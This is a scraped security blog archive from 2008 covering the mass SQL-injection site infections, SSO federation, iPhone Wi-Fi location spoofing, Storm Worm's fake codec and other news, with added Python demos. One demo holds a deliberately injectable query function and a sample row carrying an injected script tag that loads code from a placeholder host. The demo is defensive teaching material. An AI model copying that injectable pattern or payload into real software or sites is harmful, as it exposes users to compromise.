  • Standard: 350 Euros, OWASP Members: 300 Euros, Students: 225 Euros.
  • Conference Dinner (Evening of May 21st): 50 Euros
  • Conference Tutorials: 825 Euros, Student Fee: 430 Euros
  • CONFidence Poland 2008 members get a € 35 reduction on OWASP (see OWASP On a Plane below).
  • ISSA, ISACA and L-SEC Members get a € 35 reduction.

http://www.owasp.org/index.php/AppSecEU08

Thursday

Mass website infections from January solved



Our friends at the Internet Storm Center have solved the mystery of the mass website infection in January pointing to the uc8010.com domain. Computer Associates was one of the victims. It has been confirmed that SQL injection was the attack vector. Injection attacks are listed as number 2 in the OWASP Top Ten application vulnerabilities.

Yesterday, one of our old friends, Dr. Neal Krawetz, pointed us to another site hosting malicious JavaScript files with various exploits. While those exploits were more or less standard, we managed to uncover a rare gem among them – the actual executable that is used by the bad guys in order to compromise web sites.

While we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used. The strategy was relatively simple: they used search engines in order to find potentially vulnerable applications and then tried to exploit them. The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site.

The utility we recovered does the same thing. The interface appears to be in Chinese, so it is a bit difficult to navigate around the utility, but we did some initial analysis of the code (which is very big) to confirm what it does.
Full analysis at the ISC.
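To make the attack mechanism concrete from the defender's side, here is an added example that is not part of the ISC analysis or the recovered tool: an SQLite-backed product search written with string concatenation next to its parameterized form, and a scanner that walks every text column of every table looking for injected script tags, which is how a site owner can check whether the content that gets rendered into every page has been tampered with. The table, the sample rows and the example.invalid URL are all constructed.

```python
import re
import sqlite3

# Constructed sample rows for a product catalogue that is rendered into HTML.
# The third row shows what a tampered record looks like: a script tag
# appended to an ordinary text column (the URL is a placeholder).
SAMPLE_ROWS = [
    ("Laptop", "15 inch, 8 GB RAM"),
    ("O'Reilly Guide", "Book on web development"),
    ("Keyboard", 'Mechanical<script src="http://example.invalid/m.js"></script>'),
]


def build_db():
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany("INSERT INTO products (name, description) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def search_unsafe(conn, term):
    """Vulnerable form: the term is pasted into the SQL text, so any quote or
    operator inside it is parsed as SQL rather than treated as data. Returns
    the matching names, or the parser's error when the input breaks the
    statement (a plain apostrophe is enough to show the problem)."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return "SQL error: " + str(exc)


def search_safe(conn, term):
    """Hardened form: a bound parameter is always a string value, never SQL,
    so an apostrophe in the term is just an apostrophe."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def find_injected_script_tags(conn):
    """Walk every TEXT column of every table and return (table, column, rowid)
    for each cell that contains a script tag. A tag injected into a column
    that is rendered into HTML is served to every visitor of that page."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = conn.execute('PRAGMA table_info("%s")' % table).fetchall()
        text_cols = [c[1] for c in cols if c[2].upper().startswith("TEXT")]
        for col in text_cols:
            for rowid, value in conn.execute(
                    'SELECT rowid, "%s" FROM "%s"' % (col, table)):
                if value is not None and SCRIPT_TAG.search(str(value)):
                    hits.append((table, col, rowid))
    return hits


if __name__ == "__main__":
    db = build_db()
    print("safe  :", search_safe(db, "O'Reilly"))
    print("unsafe:", search_unsafe(db, "O'Reilly"))
    print("tampered cells:", find_injected_script_tags(db))
```

The scanner is more general than the January attack it illustrates: it flags a script tag in any text column of any table, which also catches a tag injected into a column the attacker happened to hit that you had not thought of.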


Some random thoughts from my Access Control Systems and Methodology Class



I'm pursuing a Master's in ICT Audit & Security, and last Tuesday we had a class on Access Control Systems and Methodology (as part of the Common Body of Knowledge for CISSP). So we covered AAA, Kerberos, SSO, etc. Not much new stuff for me, but I did take some notes during the class on related information that was not discussed.

When talking about biometrics (as (secure?) authentication *cough*), I remembered the case of the German minister and his copied fingerprints.

Still, biometrics seems to be very hot (technewsworld.com), as seen at the latest RSA show. Just be careful that it has been well tested. Look for someone with a security mindset (schneier.com) to test it.

When the teacher was discussing hashes and encrypted passwords, he mentioned brute-forcing passwords, but I didn't hear him mention rainbow tables.
And when talking about cracking password hashes, have a look at this nice tool:
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.
There was one topic in the class that was new to me: federation. Unfortunately, he had to skip this part since he was out of time. So let's have a look.

Example of SSO Federation

Large enterprise with several separate business units


It is quite common to have several separate business units in a large enterprise, each running their own single sign on systems. It is quite easy, using a product like Ping, to quickly accept levels of trust for authentication from one business unit and pass the user on to applications and/or information managed by another business unit without requiring re-authentication and/or the need for additional ids and passwords. This achieves single or reduced sign on for the user while reducing enterprise user management costs. This requires little additional hardware and software and can be done quite quickly.

Between your enterprise and business partners or customers


Often times your enterprise will have many customers or business partners who are accessing one or many of your internal applications. Depending on the degree of trust you have with these other enterprises, you can use federated authentication with them.

For example, Susan, a business partner's employee will logon to the business partner's systems. When she clicks on a link to an application in your enterprise, the business partner's single sign on system creates a security assertion and passes this to your enterprise. Your enterprise's single sign on system then takes the assertion, reviews it, and if accepted grants Susan access to the application without requiring her to logon.

This reduces your overall user management costs by not having to grant Susan an id and password. It makes Susan's work life easier by not having to remember another id and password.

Further, the single sign on system can be used to require stronger authentication. For example, Susan may be granted access to low risk applications. However, when she clicks on a high risk application, the SSO system may require her to re-authenticate using a stronger authentication mechanism such as a digital certificate, security token, smart card, biometric or combinations thereof.

Between your enterprise and outsourced providers


It is quite common for enterprises today to have outsourced portions of their internal processes. Examples include inventory management, benefits, 401k management, training etc.

When your employee clicks on a link to one of these functions, say their benefits plan, your enterprise SSO system prepares a security assertion and sends this to your benefits supplier. Their internal SSO system reviews the assertion and if accepted grants your employee immediate access to their information without having to log in using an id and password issued from the benefits supplier.

This provides your employees with ease of use. It also reduces the benefits supplier's management costs in issuing ids and passwords.

Ping Identity federation is an excellent product to use to quickly build federated authentication trust between disparate SSO and identity systems. Other identity product vendors also have identity federation products in their product suites.

A more detailed discussion about federation protocols can be found in Authentication Federation. (Source: Authenticationworld.com)
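The Susan scenario above, as an added example that is neither Ping Identity's nor Authenticationworld's code: the partner's IdP issues a signed assertion carrying subject, issuer, audience, validity window and authentication level, and the receiving SSO system verifies all of that before deciding between granting access and demanding step-up authentication for a high-risk application. It stands in an HMAC with a shared secret for a SAML XML signature, and the issuer, audience and application names are invented.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed shared secret between the partner IdP and our SSO system; a
# real deployment would verify an X.509 signature (SAML), not an HMAC.
SHARED_SECRET = b"constructed-demo-secret-do-not-reuse"

# Hypothetical application catalogue: minimum authentication level per app.
# 1 = password only, 2 = stronger factor (token, certificate, smart card ...).
APP_MIN_AUTH_LEVEL = {"expense-reports": 1, "payroll-admin": 2}


class FederationError(Exception):
    """Raised when an assertion must not be accepted."""


def b64enc(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64dec(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_assertion(subject, issuer, audience, auth_level, ttl=300, now=None):
    """Partner IdP side: describe the authenticated user and sign the claims."""
    now = time.time() if now is None else now
    claims = {"sub": subject, "iss": issuer, "aud": audience,
              "auth_level": auth_level, "iat": now, "exp": now + ttl}
    body = json.dumps(claims, sort_keys=True).encode()
    sig = hmac.new(SHARED_SECRET, body, hashlib.sha256).digest()
    return b64enc(body) + "." + b64enc(sig)


def verify_assertion(token, expected_issuer, expected_audience, now=None):
    """Our SSO side: check signature, issuer, audience and validity window
    before trusting anything the assertion says about the user."""
    now = time.time() if now is None else now
    try:
        body_b64, sig_b64 = token.split(".")
        body, sig = b64dec(body_b64), b64dec(sig_b64)
    except (ValueError, TypeError):
        raise FederationError("malformed assertion")
    expected = hmac.new(SHARED_SECRET, body, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise FederationError("bad signature")
    claims = json.loads(body)
    if claims.get("iss") != expected_issuer:
        raise FederationError("untrusted issuer")
    if claims.get("aud") != expected_audience:        # replayed at another SP
        raise FederationError("assertion not meant for this service")
    if not (claims["iat"] - 60 <= now <= claims["exp"]):  # 60 s clock skew
        raise FederationError("assertion expired or not yet valid")
    return claims


def authorize(token, app, expected_issuer="partner-idp",
              expected_audience="our-enterprise", now=None):
    """Return 'granted' when the asserted authentication level covers the
    application's risk, or 'step-up' when stronger authentication is needed."""
    claims = verify_assertion(token, expected_issuer, expected_audience, now)
    if claims["auth_level"] < APP_MIN_AUTH_LEVEL[app]:
        return "step-up"
    return "granted"


if __name__ == "__main__":
    token = issue_assertion("susan", "partner-idp", "our-enterprise", auth_level=1)
    print("expense-reports:", authorize(token, "expense-reports"))
    print("payroll-admin  :", authorize(token, "payroll-admin"))
```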

Wednesday

Phrack Issue #65 released




Phrack Issue 65 is out. Get the tar.gz here.

From the Introduction:

This is the 65th edition of Phrack and we are still alive.


Despite that some people say they don't learn anything when reading Phrack, we still think that Phrack is one of the best underground communication methods. Oh well, for sure, there are other and even better ways. But Phrack is one way and probably not the worst. We have tried to release this issue earlier but editing a magazine (and especially Phrack) is not easy. We have received a lot of positive comments after Phrack release #64 and a lot of people said they will contribute. However we did not see anything coming. Almost all articles from this release are coming from our first circle of friends. Again.

This release, despite that it is not the perfect one, tries to bring a good mix between technical articles and what we call spirit articles. Our introducing and concluding articles (Phrack Prophile and The Underground Myth) bring two opposite visions of the hacking underground.

Contradiction? No. Freedom of speech.

We have kept with our regular columns Phrack World News and International Scenes. We also have decided to publish less exploit articles. However, low-level hackers should find their way easily into this new release.


Dutch Report on High Tech Crimes shows that IT students are being recruited by Criminals


On security.nl, I discovered a very interesting research paper on High Tech Crimes and the link with Organized Crime. The WODC (the Dutch abbreviation for Wetenschappelijk Onderzoek- en Documentatiecentrum, in English: Research and Documentation Centre) can best be characterised as an international criminal justice knowledge centre. "Excellence" and "customer-orientation" are the organisation's guiding principles. Its major output is knowledge for the benefit of policy development.

Description of the report

The lack of knowledge concerning the perpetrators of high-tech crime and the involvement of organised crime is an important gap in terms of developing an efficient and effective policy. As such, the Ministry of Justice felt that it was fitting to commission a literature inventory, mapping the status quo and existing knowledge in relation to high-tech crime.

The full report in Dutch (1.44 MB, 224 pages)
Some highlights of the report:
  • Young people with good IT skills are being recruited at universities, computer clubs and on the internet to support criminals (especially by groups from Russia and Eastern Europe)
  • The number of IT-related crimes is rapidly increasing
  • Selling or renting botnets has become a lucrative business (in which The Netherlands plays a big part)
  • Criminal organizations already have quite some IT skill "in house"

Interesting stuff. I checked if Google Translate could process the document but it wouldn't work like that. I know that software cannot perfectly translate but if someone knows another engine that will, let me know. I don't feel like translating 200 pages.

Tuesday

Spoofing the iPhone's Wi-Fi Positioning System



From heise.co.uk:

The Wi-Fi Positioning System (WPS) used by Apple's iPhone and iPod Touch and other mobile devices can easily be supplied with false information that makes the mobile think it's somewhere other than its true location. Researchers at the Swiss Federal Institute of Technology Zürich have found that all you need is a laptop, a Wi-Fi access point transmitter and a database of Wi-Fi access point locations.

The MAC address of an active Wi-Fi access point is continuously announced. WPS works by the client detecting the MAC addresses of nearby access points and comparing the cluster of found addresses with a database of clusters referred to geographical locations. The iPhone and iPod Touch apparently make use of the Skyhook Wireless Inc database of Wi-Fi access point locations, as do Nokia Symbian-based phones and PCs equipped with Skyhook's Loki plugin.

Having GPS-like navigation on the iPhone or iPod Touch using open access points? I always suspected that MAC addresses were used, and this confirms it. Compared to cellular tower positioning, there is no authentication, so spoofing becomes very easy.
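As an added example (not the ETH researchers' or Skyhook's code), here is the lookup the article describes against a constructed BSSID-to-location database: the client averages the catalogued positions of the access points it can see, and two plausibility checks reject a scan whose APs are catalogued far apart from each other and a fix that would require impossible travel speed since the previous one. Neither check authenticates the beacons, which is the gap the article points out; they only make a crude spoof easier to notice.

```python
import math

# Constructed access-point database (BSSID -> lat, lon) standing in for a
# provider database such as Skyhook's. MACs and coordinates are made up.
AP_DB = {
    "00:11:22:33:44:01": (47.3769, 8.5417),   # cluster A ("Zürich")
    "00:11:22:33:44:02": (47.3771, 8.5420),
    "00:11:22:33:44:03": (47.3765, 8.5412),
    "aa:bb:cc:dd:ee:01": (51.5074, -0.1278),  # cluster B ("London")
    "aa:bb:cc:dd:ee:02": (51.5076, -0.1275),
}


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) points in degrees."""
    lat1, lon1 = map(math.radians, a)
    lat2, lon2 = map(math.radians, b)
    dlat, dlon = lat2 - lat1, lon2 - lon1
    h = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def wps_fix(observed_bssids, db=AP_DB, max_spread_km=1.0):
    """Estimate the position as the centroid of the known APs in a scan.

    Returns (lat, lon), or None when fewer than two APs are known or when
    the known APs lie further apart than max_spread_km. A genuine scan only
    hears APs within Wi-Fi range, so a cluster that spans kilometres means
    the database is stale or someone is replaying MAC addresses that belong
    somewhere else.
    """
    known = [db[b] for b in observed_bssids if b in db]
    if len(known) < 2:
        return None
    for i in range(len(known)):
        for j in range(i + 1, len(known)):
            if haversine_km(known[i], known[j]) > max_spread_km:
                return None
    lat = sum(p[0] for p in known) / len(known)
    lon = sum(p[1] for p in known) / len(known)
    return (lat, lon)


def plausible_move(prev_fix, prev_time_s, new_fix, new_time_s, max_speed_kmh=300.0):
    """Cross-check a new fix against the previous one and reject jumps that
    would need more than max_speed_kmh. A consistent but relocated cluster
    passes wps_fix, so this is the check that catches it."""
    hours = (new_time_s - prev_time_s) / 3600.0
    if hours <= 0:
        return False
    return haversine_km(prev_fix, new_fix) / hours <= max_speed_kmh


if __name__ == "__main__":
    scan = ["00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"]
    print("fix:", wps_fix(scan))
    print("mixed scan:", wps_fix(scan + ["aa:bb:cc:dd:ee:01"]))
```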

It also reminds me of the Italians who spoofed the RDS TMC signal for GPS systems.

Since we are talking about the iPhone/iPod Touch, here is a way to hack your iPod Touch into a VOIP Phone.


Fun: New security label on mouse to prevent botnet infection

Userfriendly.org is one of my favorite cartoons. The writer, Illiad, demonstrates how websites are used to infect PCs today. LOL




Webcast: iPhone Forensics Demonstration



Date: Thursday, April 17, 2008 at 17:00 GMT

Presented by: Jonathan A. Zdziarski

This is a free live event. Scheduled for approximately 45 minutes.

With the iPhone quickly becoming the market leader in mobile devices, the need for law enforcement personnel to perform forensic analysis of these devices is beginning to surface. Unlike most other smart phones, the iPhone incorporates desktop-like features in an easy-to-use mobile package. As a result of its high level of technology and available features, many are likely to use it as a primary device for various forms of data and communication. While some of a suspect's data can be viewed using the direct GUI interfaces in the iPhone's software, much hidden and deleted data is available as well, which may provide for more thorough evidence gathering.

Existing commercial forensic tools are sadly lacking in their ability to perform deep raw disk level recovery, and so Jonathan will demonstrate how to install his custom forensics toolkit on any existing model iPhone and send a raw disk image to a desktop machine. He will also show you how to recover files specific to the iPhone including deleted keyboard caches, photos, web objects, and much more.

Jonathan's custom forensics toolkit and his accompanying forensic manual will be available free to forensic investigators in law enforcement.

More (O'Reilly)


The CNCERT annual report on the overall security of China for 2007

From sbin.cn:

CNCERT released their annual report on the overall security status in China for 2007. You can download this report from their website. This report is in Chinese.

In this report, some numbers and trends are highlighted.

Compared with the 2006 numbers, security incidents and botnet (zombie) hosts in China increased rapidly, or even soared:

  • website phishing - 1.4 times
  • malicious code at web pages - 2.6 times
  • defaced websites - 1.5 times
  • Trojaned hosts - 22 times

where Trojaned hosts are estimated at up to one million (995,154) IPs, compared with 44,717 IPs in 2006.

Hmm. Does not look too good. I'm sure that the English version will also be released. You can find the previous reports in English here.

New version of OpenSSH and the Saint vulnerability scanner


The SAINT vulnerability scanner has been updated to v6.7.7, and OpenSSH 5.0 has been released. You might think, how can OpenSSH be a pentesting tool? Remember the SANS papers from yesterday? (Espionage - Utilizing Web 2.0, SSH Tunneling and a Trusted Insider)

OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol version
Full OpenSSH 5.0 changelog
SAINT is the Security Administrator’s Integrated Network Tool. It is used to non-intrusively detect security vulnerabilities on any remote target, including servers, workstations, networking devices, and other types of nodes. It will also gather information such as operating system types and open ports. The SAINT graphical user interface provides access to SAINT’s data management, scan configuration, scan scheduling, and data analysis capabilities through a web browser. Different aspects of the scan results are presented in hyperlinked HTML pages, and reports on complete scan results can be generated and saved

New features in 6.7.7:

Configuration options to customize password policy checks:

- Password length - the required number of characters in the password
- Password history - number of previous passwords which cannot be re-used
- Maximum Age - days after which the user must change the password
- Minimum Age - days before which the user cannot change the password
- Lockout - the number of failed logins before the account is locked out

New vulnerability checks in version 6.7.7:

- cumulative Internet Explorer vulnerability (MS08-024)
- GDI remote code execution vulnerability (MS08-021)
- CUPS
- Firefox, Thunderbird and SeaMonkey
- Novell eDirectory LDAP DelRequest Message Handling Buffer Overflow
- Asterisk vulnerabilities
- Ruby
- Acrobat Reader Linux vulnerability
- OpenSSH
- Java Web Start vulnerabilities
- Internet Explorer vulnerabilities involving setRequestHeader
- additional Aurigma vulnerabilities
- ASUS Remote Console DPC Proxy Service Buffer Overflow
- solidDB vulnerabilities
- McAfee ePolicy Orchestrator Framework Services HTTP Buffer Overflow
- Cisco IOS vulnerabilities
- HP OpenView Network Node Manager HTTP Handling Buffer Overflow
- OpenVMS ssh
- QuickTime vulnerabilities
- Opera vulnerabilities
- Macrovision InstallShield OCI Untrusted Library Loading Vulnerability
- phpMyAdmin vulnerability
- Lighttpd
- Wireshark
- Asterisk Invalid RTP Payload Type Number Memory Corruption
- Windows DNS Spoofing vulnerability (MS08-020)
- hxvz.dll ActiveX vulnerability (MS08-023)
- Microsoft Project vulnerability (MS08-018)
- Windows kernel user mode callback vulnerability (MS08-025)
- Visio vulnerabilities (MS08-019)
- VBScript and JScript engine script decoding vulnerability (MS08-022)

New exploits in this version:

- Solaris rpc.ypupdated exploit
- MDaemon IMAP FETCH exploit
- Microsoft Office memory corruption exploit
- Cisco UCP CSuserCGI.exe exploit

Download basic release

Monday

The latest security papers from SANS Reading room



It's worth checking out the SANS Reading Room regularly. There are some really interesting topics that appear in there:

Presentation skills: The 10/20/30 rule from Guy Kawasaki

Another "Keep it simple" technique, this time from Guy Kawasaki. I had seen a video of him before as an example of a good presentation (The Art of Innovation), but I hadn't seen his 10/20/30 rule before.



I found a lot of other presentation practices on the blog of Jim MacLennan in "The Good, The Bad and The Ugly of Powerpoint", which gives a very nice overview:

Presentation Zen: by Garr Reynolds, has a different approach, well at least of late - he is reviewing / talking about different presentation "methods" / styles. Some of this stuff is worth reviewing - especially if you are working to get visibility / buy-in, trying to rise above the clutter of standard corporate presentations.

  • The Monta Method - refugee from a game show, but it pulls in the audience, gets them engaged
  • The Godin Method - focuses on visuals that catalyze strong ideas; freely admits that presenting is selling
    • Hey, that's an idea that not enough folks embrace! Way too many corporate presentations are just slides filled with long text, read aloud by the presenter - PowerPoint as Big-Text Word Processor (independent validation on this and other classic PPT problems - see Johansson's post)
  • The Kawasaki Method - ten slides, ten major ideas. A nice way to address the "eating an elephant" issue that many presentations struggle with - how to chunk up the information into bite-sized pieces
  • The Takahashi Method - Apparently, also known as the Lessig Method; One word per slide, keep the pictures simple
    • One stellar example of this approach has been pointed to by many - the first citation I saw was BoingBoing - by Dick Hardt, founder and CEO of Sxip, on Identity 2.0. Immediately engaging, really does an excellent job of explaining a not-obvious concept, and the style really appeals to the digerati.
      • The bigger topic at hand here - Identity 2.0 and the macro topic Web 2.0 - has some interesting reading available as well - interesting, worth diving into if you are looking / re-looking into the relevance of the internet for new and established business

Death to Bad Powerpoint: yet another site that laments the lack of style in most PPTs, but this one has had some good posts, including a pointer to a terrific 10 Commandments article, which is the best simple list of critical things you must / must not do - my favorite is "avoid reading your slides", something that really drives me up a wall. He's also citing a 2003 article that places a cost on time spent in meetings.

Read the entire article for his other views on presentations. By itself, his blog has many other interesting articles.

How to watch security conferences on your ipod



There are a lot of security conferences and of course you cannot visit them all. Luckily, some of them record the presentations and put them online, like Defcon 15 or 24C3. Put together, that's quite a few hours of video. How will we find the time to watch all of them? Well, we all have moments when we are waiting (for a client, for a train, etc.) and we don't always have our laptop with us.

That is what I like about the latest generation of iPods and the iPod Touch: video playback! The iPod Touch in particular has a very nice display for watching video, and it fits in my inside pocket.
Just download the freeware Videora iPod Converter 3.07 from Red Kawa and convert the video for your iPod. Doing this, I was recently able to watch quite a bit of video from Defcon 15, like Pen-testing Wi-Fi, How to be a WiFi Ninja, Dirty Secrets of the Security Industry, Virtualization: Enough holes to work Vegas, and some others. Just try it.

Sunday

Hakin9 Magazine 3rd Edition 2008: LDAP cracking



This week, I found the latest issue of Hakin9 in my (snail) mail. I took a subscription a few months ago and I haven't regretted it. Topics of this month's issue:

  • Pentest Labs Using LiveCDs...
  • Best Practices for Secure Shell...
  • Cracking LDAP Salted SHA Hashes...
  • Javascript Obfuscation Techniques...
  • Breaking in Add-on Malwares...
  • Vulnerabilities Due to Type Conversion of Integers...
  • Authentication and Encryption Techniques...
  • Consumers Test - We Help You Choose the Most Reliable Anti Virus Program...
  • Interview with Marcus J. Ranum...
  • Self Exposure by Richard Bejtlich and Harlan Carvey...

Hakin9 is a bi-monthly publication on IT security. The magazine is published in English and distributed in all English-speaking countries.

Hakin9 is a source of advanced, practical guidelines regarding the latest hacking methods as well as the ways of securing systems, networks and applications.

What I also love is that they always include a CD with tools. It's mostly an updated BackTrack 2 with some other tools on it, as well as video tutorials.

In this issue, they had a consumer test of anti-virus software. It didn't surprise me that a few of the big ones like McAfee and Symantec scored lower on the effectiveness scale in their review. On the other hand, they have very good endpoint security (HIDS) and central management. Avira seems to have central management too, but limited to 75 clients. Some gateway products support a second engine, and that might be an interesting option to use. You can't have it all, I guess. I'll come back to this topic later.

For some more information about the issue, go here.

Saturday

How to start a Computer Security Incident Response Team



A friend referred me to CERT's Handbook for Computer Security Incident Response Teams (CSIRTs). If you are ever planning to set up a CSIRT, you should have a look at this document:

This document provides guidance on forming and operating a computer security incident response team (CSIRT). In particular, it helps an organization to define and document the nature and scope of a computer security incident handling service, which is the core service of a CSIRT. The document explains the functions that make up the service; how those functions interrelate; and the tools, procedures, and roles necessary to implement the service.
This document also describes how CSIRTs interact with other organizations and how to handle sensitive information. In addition, operational and technical issues are covered, such as equipment, security, and staffing considerations.

This document is intended to provide a valuable resource to both newly forming teams and existing teams whose services, policies, and procedures are not clearly defined or documented. The primary audience for this document is managers who are responsible for the creation or operation of a CSIRT or an incident handling service. It can also be used as a reference for all CSIRT staff, higher level managers, and others who interact with a CSIRT.
There are other documents you could have a look at. Here is the CERT guide from ENISA:

More details are available in the ENISA CERT Fact Sheet:
http://www.enisa.europa.eu/doc/pdf/FACsheets/CERT_Fact_Sheet.pdf

Thursday

Some ITILv3 resources and the relation to information security



I did talk about Deming, the father of quality management but apparently I haven't mentioned ITIL.

The Information Technology Infrastructure Library (ITIL) is a set of concepts and techniques for managing information technology (IT) infrastructure, development, and operations.

What is the relation to (information) security? Well, the security triad C-I-A (confidentiality, integrity and availability) can be supported by ITIL processes such as capacity management, problem management and change management.

Version 3 has been available since May 2007 and extends version 2. If you want to have a look at the Key Differences Between ITIL v2 and v3, the previous link is a good place to start.

Also have a look at the ILX website, which has a nice introduction video.

For those who want to dive deeper into this framework, you can start with the excellent free e-book "An Introductory Overview of ITIL V3" (English version).

ITIL v3, published in May 2007, comprises 5 key volumes:

1. Service Strategy
2. Service Design
3. Service Transition
4. Service Operation
5. Continual Service Improvement
Here is the Official ITIL Website and The ITIL Open Guide.

So let's give you 10 ways ITIL can improve information security:

There are a number of important ways that ITIL can improve how organizations implement and manage information security.

  1. ITIL keeps information security business and service focused. Too often, information security is perceived as a "cost center" or "hindrance" to business functions. With ITIL, business process owners and IT negotiate information security services; this ensures that the services are aligned with the business' needs.
  2. ITIL can enable organizations to develop and implement information security in a structured, clear way based on best practices. Information security staff can move from "fire fighting" mode to a more structured and planned approach.
  3. With its requirement for continuous review, ITIL can help ensure that information security measures maintain their effectiveness as requirements, environments, and threats change.
  4. ITIL establishes documented processes and standards (such as SLAs and OLAs) that can be audited and monitored. This can help an organization understand the effectiveness of its information security program and comply with regulatory requirements (for example, HIPAA or Sarbanes Oxley).
  5. ITIL provides a foundation upon which information security can build. It requires a number of best practices - such as Change Management, Configuration Management, and Incident Management - that can significantly improve information security. For example, a considerable number of information security issues are caused by inadequate change management, such as misconfigured servers.
  6. ITIL enables information security staff to discuss information security in terms other groups can understand and appreciate. Many managers can't "relate" to low-level details about encryption or firewall rules, but they are likely to understand and appreciate ITIL concepts such as incorporating information security into defined processes for handling problems, improving service, and maintaining SLAs. ITIL can help managers understand that information security is a key part of having a successful, well-run organization.
  7. The organized ITIL framework prevents the rushed, disorganized implementation of information security measures. ITIL requires designing and building consistent, measurable information security measures into IT services rather than after-the-fact or after an incident. This ultimately saves time, money, and effort.
  8. The reporting required by ITIL keeps an organization's management well informed about the effectiveness of their organization's information security measures. The reporting also allows management to make informed decisions about the risks their organization has.
  9. ITIL defines roles and responsibilities for information security. During an incident, it's clear who will respond and how they will do so.
  10. ITIL establishes a common language for discussing information security. This can allow information security staff to communicate more effectively with internal and external business partners, such as an organization's outsourced security service.

New flaw in Belgian RFID ePassports



In June 2007, I blogged about the security vulnerabilities in Belgian passports. That post concerned the passports issued between the end of 2004 and July 2006; the later ones were more secure.

It seems that the newer generation is also flawed. Here is the research paper that describes the problem. Basically, the e-passport standard does not specify how a passport should answer invalid requests, so every country's implementation does it its own way, much like the differences between TCP/IP stack implementations that allow OS fingerprinting. The different answers to these invalid commands allow an attacker to identify which country issued the passport.

From the paper:

The detection is done at the logical level, i.e. by looking at the bytes that an e-passport sends as reply in response to some carefully chosen commands from the reader. The attack is able to distinguish e-passports of all countries that we managed to get hold of: Australia, Belgium, France, Germany, Greece, Italy, the Netherlands, Poland, Spain, and Sweden. The ease with which we were able to find differences between these passports, and the huge space of potential fingerprints, suggests that discriminating between additional countries should not pose any problems, unless there are countries that have an identical implementation.
Time to wrap it in aluminum foil! :-)

Storm Worm posing again as video codec



Maybe it's because of all the attention 'Kraken' is getting, but another malicious spam wave has begun. When talking about convincing users to install something, we have to warn you about Storm Worm (again). It has started a new campaign to convince users to install a video codec called 'Storm Codec' (yes, really!).

Today the Storm Botnet is spamming out links to its latest website inside love themed emails. As is usual for Storm, the spam emails contain a short message and a link. Some subject lines are 'Just you and me', 'For you...Sweetheart!', 'My heart was stolen' and 'Only you'.

This latest website asks the user to download and run the ‘Storm Codec’. Not surprisingly the files StormCodec.exe and StormCodec8.exe, which are linked to by the image of a media player and the ‘Download it’ link, are in fact Storm variants. (Source: Marshal)

----

Of course, the said “codec” is actually a NUWAR/Storm variant, which Trend Micro already detects as WORM_NUWAR.JQ since April 2.

If the social engineering tactic of using video codecs is familiar, it’s because it is — ZLOB Trojans became infamous because of it, after all (see some detailed analysis here). Thus, the Storm gang’s attempt to venture into the said codec “business” has our researchers speculating whether they are now in cahoots with the ZLOB authors, or that they are trying to take over ZLOB’s niche, much like they did with STRATION when the two first started battling it out late 2006. Or maybe the gang is just trying to reaffirm to their competition that they’re still the one to beat.

In the end though, it’s still the unsuspecting users who become collateral damage of all this brouhaha. Users are thus advised to be wary when visiting Web sites or blogs, especially those that require installation or execution of files. Video files — especially those posted online — almost always do not require video codecs anymore, lest they lose the much coveted site traffic to other sites (YouTube, anyone?). Come to think of it, if someone really loves a person that much, he or she won’t have that person go all through the trouble of finding the appropriate codec, right? (Source:Trendmicro)

The funny thing is that when googling for some more information, I encountered a codec on www.softpedia.com called Storm Codec 7.01.19 made by Storm. The file is a hefty 23MB and the site claims that it is verified and virus free. It's probably too big to upload to VirusTotal, but some of the virus scanners I have also claim it's clean. Maybe a freak coincidence? More experimentation to follow.

Anyway, most users won't know the difference between Storm Codec and some of the real codecs they need to play online media. So educate your peers.

Live Flash exploitation through banners on popular websites



As a side note to the AudioParasitics podcast, I warned readers to upgrade their Adobe Flash. There is no time to wait to patch, because we are seeing active exploitation through popular sites:

Websense® Security Labs™ has received reports of a malicious Flash banner ad on USATODAY.com, a prominent news web site. The banner ad leads to the download of various spyware and ransomware, appearing as legit anti-virus scanners to the uninitiated.

Without any user interaction, the banner ad causes the browser to be minimized to the bottom right-most corner of the desktop, behind a fake warning popup dialog box. In the screenshot below, we clicked “cancel”.

Even prior to clicking “cancel”, we noticed that the desktop is already receiving data from the verified malicious host--all of this without any user interaction.

Clicking “cancel” still takes the visitor to a fake malware scanner site, which, despite subsequently clicking “no” or “cancel” to all the popup dialog boxes, leads to a “free” fake scan, which then results in a fake anti-virus scan result page.
